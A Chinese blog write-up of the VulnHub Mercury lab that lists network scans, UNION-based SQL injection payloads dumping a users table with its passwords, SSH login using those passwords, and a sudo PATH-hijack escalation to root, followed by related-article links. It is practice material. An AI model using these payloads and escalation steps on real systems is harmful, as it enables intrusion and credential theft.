xing-vulnhub-mercury靶场#渗透测试

最新推荐文章于 2024-09-25 16:45:00 发布
最新推荐文章于 2024-09-25 16:45:00 发布
阅读量958 收藏 25
点赞数 12
文章标签: web安全 数据库 网络安全 安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chinese_cabbage0/article/details/135948367
版权
本文描述了一次针对Vulnhub靶场的黑客攻击过程,通过网络配置、SQL注入技巧,获取Mercury靶场的敏感信息,随后利用SSH登录并逐步渗透,最终获取flag的过程。
摘要由CSDN通过智能技术生成

kali:192.168.2.15

靶机:192.168.2.25

  1. 这个靶场需要修改网卡配置,网卡配置修改在网站连接有教程:vulnhub靶场——THE PLANETS: MERCURY_trinity.txt.bak-CSDN博客
  2. netdiscover -r ip //扫描靶场主机ip
  3. namp -p- ip -a //查看靶场的详细信息
  4. 开放8080和22端口号---->http 8080然后找信息,发现404报错有个目录,进入目录,有一个目录存在漏洞----> 1 or 1=1 返回了所有信息----->尝试用1 order by 1来查看返回的字段,发现只有一个字段---->1 union all select database();使用这条sql语句来查询数据库名字---->1 union all select table_name from information_schema.tables where table_schema='mercury';使用sql语句来查询元数据库中mercury中的表名---->1 union all select column_name from information_schema.columns where table_schema='mercury' and table_name='users';查询这个users列中的内容--->1 union select group_concat(id,':',username,':',password) from mercury.users; 查看来自mercury库中users列中的id,username,password的内容

1 union select database(); //查询数据库 结果为mercury可以利用库字来查表 1 union select table_name from information_schema.tables where table_schema='mercury'; //查询表名 结果为facts和users可以利用表名来查列 1 union select column_name from information_schema.columns where table_schema='mercury' and table_name='users'; //查看列名 结果为id,username,password可以直接查看这三个的内容,上一条语句也可以直接不带table_schema='mercury'这段语句好像 1 union group_concat(id,':',username,':',password) from mercury.users; //查询内容 结果为如下 1:john:johnny1987 2:laura:lovemykids111 3:sam:lovemybeer111 4:webmaster:mercuryisthesizeof0.056Earths 最后依据联合查询语句意为从mercury这个库中的users这个列中来提取id,username,password的数据内容

猜测可以使用ssh进行登录然后在继续渗透 于是挨个试只有最后一个可以登录使用webmaster:mercuryisthesizeof0.056Earths ssh webmaster@192.168.2.25 //进行远程,然后输入密码 远程登陆成功后在user_flag.txt看到第一个flag,然后ls -l看到一个mercury_proj的目录进去看看 有一个notes.txt文件 cat notes.txt 发现一个base64编码,于是使用kali解码: echo 'bWVyY3VyeW1lYW5kaWFtZXRlcmlzNDg4MGttCg==' | base64 -d //加-d为解码,默认不加为编码 结果为mercurymeandiameteris4880km感觉是个密码 su linuxmaster //登录linuxmaster使用上一行的密码可以登录 然后在sudo -l使用密码mercurymeandiameteris4880km //sudo -l 命令用于列出用户可以执行的 sudo 命令 ls -l /usr/bin/check_syslog.sh //查看这个shell cat /usr/bin/check_syslog.sh 3.whereis vi //用于查找vi编辑器的二进制文件源代码,例如vi编辑器安装在/usr/bin/目录下那么执行whereis vi会返回该目录路径 4.ls -la //代表列出权限,a代表列出所有文件目录,包括点开头的隐藏文件 5.ln -s /usr/bin/vi tail 的意思是:创建一个名为 tail 的符号链接,该链接指向 /usr/bin/vi 文件。 换句话说,当你通过 tail 命令访问时,实际上你是在访问 /usr/bin/vi文件---这样做在当前目录下./tail就相当于执行了vi命令。 续上命令在执行export PATH=/home/linuxmaster:$PATH执行这条命令之后再次目录下使用tail就相当于使用vi命令了 sudo --preserve-env=PATH /usr/bin/check_syslog.sh //sudo以保留环境变量PATH的方式执行 /usr/bin/check syslog.sh 然后输入:!/bin/bash可以直接切换到root 然后cd \ cat root_flag.txt //结束

xing.yu.CTF
关注
Mercury 靶机 wp
m0_52496313的博客
10-08 462
Mercury 靶机 wp
mercury-playground:使用 Mercury 框架的测试项目
07-04
水星游乐场 与 Mercury 混在一起的测试项目 跑步 必需:NodeJS,Browserify ./setup.sh 安装使用的库 ./build.sh 创建 Javascript 包 ./run.sh 在上启动 Python HTTP 服务器
vulnhub靶场——THE PLANETS: MERCURY
Czheisenberg的博客
02-12 2439
vulnhub靶场——THE PLANETS: MERCURY
看完这篇 教你玩转渗透测试靶机Vulnhub——The Planets:Mercury
Aluxian_的博客
07-09 928
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这是一个漏洞靶机,老样子需要找到flag即可。这个靶机难度中等吧1.信息收集获取ip地址 和端口信息web等 查看F12源码信息2.sqlmap基本使用这里就不讲了DC3有写或者别的文章也有讲,ssh-keygen得登入!3.漏洞得利用(漏洞很强大!4.(环境变量)提权得学习!
看完这篇 教你玩转渗透测试靶机Vulnhub——The Planets Mercury_mercury 靶场
2401_84788430的博客
05-12 451
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上软件测试知识点,真正体系化!由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新需要这份系统化的资料的朋友,可以戳这里获取渗透机:kali IP :192.168.0.105 靶机IP :192.168.0.103 开启了和端口老样子先访问,说还在开发中直接扫后台 扫到了一个进行访问,得到三个路径分别访问! 这里点进去我们可以
vulnhub靶场——DarkHole 1
Czheisenberg的博客
02-17 3777
vulnhub靶场——DarkHole 1 WriteUp
vulnhub-The Planets: Mercury
qq_43006864的博客
06-02 919
The Planets: Mercury ~ VulnHub靶机:攻击机:Linux kali 5.10.0-kali3-amd64 #1 SMP Debian 5.10.13-1kali1 (2021-02-08) x86_64 GNU/Linux信息收集:nmap 192.168.1.1/24进一步探测端口信息nmap -sS -sV -A -p- 192.168.1.114访问一下8080端口,说是你好此网站目前正在开发中,请稍后再查看。随便访问一下错误页面。 给了三个提示。indexrobots.t
Mercury性能测试报告-模板
03-05
Mercury性能测试报告-模板》是一份详细记录软件或系统在执行性能测试时的数据、分析及结论的文档。此报告通常用于评估系统的处理能力、稳定性、响应时间和资源利用率等关键性能指标。以下是对报告中可能包含的重要...
si-units:使用 Mercury 类型类的类型安全和功能性 SI 单位实现
07-01
"si-units"项目是一个专门针对SI(国际单位制)单位的库,它利用Mercury类型的类来确保类型安全,并提供了功能丰富的API以支持SI单位的计算和操作。这个库的设计目的是帮助开发者在处理与物理量相关的计算时避免常见...
02Mercury5e and M5e-Compact_M5e-Compact_Mercury5e_Developer’sGui
09-30
Mercury5e and M5e-Compact Developer's Guide》是专为开发人员设计的一份详细文档,旨在帮助用户理解并有效地使用Mercury5e和M5e-Compact系列硬件及相关的开发工具。这份指南涵盖了从初步安装到高级应用的所有...
mercury-lang:解析Mercury代码并返回JSON格式的解析树的软件包
04-17
该程序包仅解析Mercury代码,并返回JSON格式的解析树。 它在环境中用于将代码转换为声音和视觉对象。 在将来的版本中,它将在基于浏览器的Mercury中使用。 :pager: 汞? Mercury是用于算法电子音乐的实时编码的一...
网络安全证书考取相关知识
aa98865646的博客
09-21 616
作者是个想进入网络安全行业发展的小白,目前没啥钱,是想自学以后挖漏洞赚钱的,看了这两个算是比较常见的证书看起来都要花不少钱的话,我感觉自己还是先自学一段时间再说吧,实战更重要,这些证书等以后有机会慢慢考吧,如果需要的话。欢迎大佬补充其他适合小白考取的证书,目前感觉4800+480的NISP一级证书比较适合在学校的小白,CISP的话再NISP考到二级以后再加钱4000就可以换成CISP了,NISP适合学生,CISP适合职场啊,不过都是要钱啊。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
09-24 619
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
网络安全:腾讯云智、绿盟、美团、联想的面经
persist213的博客
09-21 1476
网安面试指南》《Java代码审计》《Web安全》我从4月份找到现在一共面了四家公司,来和大家分享一下我的面试经历(本文来自一位朋友的面试经历)。
网络安全全方略
AI逍遥子
09-25 1069
网络安全全方略是一个系统化、全面化的过程,涉及策略制定、技术实施、管理流程、技术维护和文化建设等多个方面。通过构建一个全方位、多层次的网络安全防护体系,可以有效保护网络系统、数据和服务免受各种威胁,保业务的连续性和数据的完整性。
入门网络安全工程师要学习哪些内容
最新发布
白帽子佳奇的博客
09-25 1640
大家都知道网络安全行业很火,这个行业因为国家政策趋势正在大力发展,大有可为!但很多人对还是不了解,不知道需要学什么?知了堂小编总结出以下要点。是一个概称,学习的东西很多,具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师,学的内容侧重点就和不一样,如果你想成为安全开发工程师,学的侧重点就和安全不一样。学的东西很泛,但选定方向就简单了。大致的学习流程总结就是:网络基础、操作系统、中间件、数据库。其中电脑基础:像系统Windows基础和Linux基础、HTML基础、代码JS基础等。
2024网络安全与黑客技术:零基础自学指南
2401_85026965的博客
09-19 1993
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
网络安全】网络基础第一阶段——第一节:网络协议基础---- OSI与TCP/IP协议
goldfish8848的博客
09-19 1516
从今天起,我们正式进入第二部分——网络基础。继续学习网络基础、网络协议等相关内容🌟🌟🌟首先我们来了解一下网络协议网络协议是一组规则和标准,用于定义电子设备如何在网络上进行通信。这些协议确保数据在不同设备之间传输时的准确性和一致性。网络协议涉及多个层面,通常按照 OSI(Open Systems Interconnection)模型或 TCP/IP 模型来组织,这两个模型都描述了网络通信的不同层次。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值